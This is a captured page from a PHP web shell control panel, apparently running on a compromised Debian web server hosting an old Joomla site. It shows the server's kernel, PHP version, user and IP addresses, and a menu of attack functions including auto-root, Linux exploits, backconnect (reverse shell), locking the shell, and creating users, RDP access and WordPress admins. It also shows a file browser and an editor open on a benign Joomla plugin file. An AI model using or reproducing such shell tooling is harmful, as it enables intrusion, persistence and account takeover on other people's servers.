Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.138.134.247
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dialektologia /
web /
mambots /
editors /
[ HOME SHELL ]
Name
Size
Permission
Action
tinymce
[ DIR ]
drwxr-xr-x
none.php
2.91
KB
-rw-r--r--
none.xml
535
B
-rw-r--r--
tinymce.php
10.38
KB
-rw-r--r--
tinymce.polish.xml
9.2
KB
-rw-r--r--
tinymce.xml
8.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : none.php
<?php /** * @version $Id: none.php 3551 2006-05-18 08:24:53Z stingrey $ * @package Joomla * @copyright Copyright (C) 2005 Open Source Matters. All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ // no direct access defined( '_VALID_MOS' ) or die( 'Restricted access' ); $_MAMBOTS->registerFunction( 'onInitEditor', 'botNoEditorInit' ); $_MAMBOTS->registerFunction( 'onGetEditorContents', 'botNoEditorGetContents' ); $_MAMBOTS->registerFunction( 'onEditorArea', 'botNoEditorEditorArea' ); /** * No WYSIWYG Editor - javascript initialisation */ function botNoEditorInit() { return <<<EOD <script type="text/javascript"> function insertAtCursor(myField, myValue) { if (document.selection) { // IE support myField.focus(); sel = document.selection.createRange(); sel.text = myValue; } else if (myField.selectionStart || myField.selectionStart == '0') { // MOZILLA/NETSCAPE support var startPos = myField.selectionStart; var endPos = myField.selectionEnd; myField.value = myField.value.substring(0, startPos) + myValue + myField.value.substring(endPos, myField.value.length); } else { myField.value += myValue; } } </script> EOD; } /** * No WYSIWYG Editor - copy editor contents to form field * @param string The name of the editor area * @param string The name of the form field */ function botNoEditorGetContents( $editorArea, $hiddenField ) { return <<<EOD EOD; } /** * No WYSIWYG Editor - display the editor * @param string The name of the editor area * @param string The content of the field * @param string The name of the form field * @param string The width of the editor area * @param string The height of the editor area * @param int The number of columns for the editor area * @param int The number of rows for the editor area */ function botNoEditorEditorArea( $name, $content, $hiddenField, $width, $height, $col, $row ) { global $mosConfig_live_site, $_MAMBOTS; $results = $_MAMBOTS->trigger( 'onCustomEditorButton' ); $buttons = array(); foreach ($results as $result) { if ( $result[0] ) { $buttons[] = '<img src="'.$mosConfig_live_site.'/mambots/editors-xtd/'.$result[0].'" onclick="insertAtCursor( document.adminForm.'.$hiddenField.', \''.$result[1].'\' )" alt="'.$result[1].'" />'; } } $buttons = implode( "", $buttons ); $width = $width . 'px'; $height = $height . 'px'; return <<<EOD <textarea name="$hiddenField" id="$hiddenField" cols="$col" rows="$row" style="width: $width; height: $height;">$content</textarea> <br />$buttons EOD; } ?>
Close